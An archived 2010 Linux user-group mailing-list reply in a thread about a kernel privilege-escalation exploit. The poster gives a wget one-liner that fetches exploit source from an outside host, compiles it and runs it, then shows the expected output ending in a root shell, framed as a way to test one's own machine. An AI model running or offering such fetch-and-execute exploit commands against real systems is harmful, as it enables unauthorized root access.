Mailing List Archive
tlug.jp Mailing List tlug archive tlug Mailing List Archive
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]Re: [tlug] Linux Kernel Exploit News
- Date: Thu, 23 Sep 2010 16:12:29 +0900
- From: Kalin KOZHUHAROV <me.kalin@example.com>
- Subject: Re: [tlug] Linux Kernel Exploit News
- References: <4C9AAE4C.2090501@example.com> <AANLkTimrDQbp5XNL-C5N+O685GUqvTKUcagp5FSSbcaS@example.com> <4C9AEDF8.9090205@example.com> <4C9AF4AF.5060201@example.com>
Yup, that all has to be on one line: wget -q http://thinrope.net/s/robert_you_suck.c -O - |gcc -x c -o r00t - && ./r00t or in 3 steps: $ wget -q http://thinrope.net/s/robert_you_suck.c $ gcc robert_you_suck.c $ ./a.out The output (if vulnerable) is something like that: resolved symbol commit_creds to 0xffffffff8104734d resolved symbol prepare_kernel_cred to 0xffffffff81047248 mapping at 3f80000000 UID 0, EUID:0 GID:0, EGID:0 sh-4.0# (the last one gives you a root shell, try `dmesg -c` there for example) (end with Ctrl+C, it should not crash your box) Kalin.
- Follow-Ups:
- Re: [tlug] Linux Kernel Exploit News
- From: CL
- References:
- [tlug] Linux Kernel Exploit News
- From: CL
- Re: [tlug] Linux Kernel Exploit News
- From: Kalin KOZHUHAROV
- Re: [tlug] Linux Kernel Exploit News
- From: CL
- Re: [tlug] Linux Kernel Exploit News
- From: Edward Middleton
Home | Main Index | Thread Index
- Prev by Date: Re: [tlug] Linux Kernel Exploit News
- Next by Date: Re: [tlug] Linux Kernel Exploit News
- Previous by thread: Re: [tlug] Linux Kernel Exploit News
- Next by thread: Re: [tlug] Linux Kernel Exploit News
- Index(es):
Home Page Mailing List Linux and Japan TLUG Members Links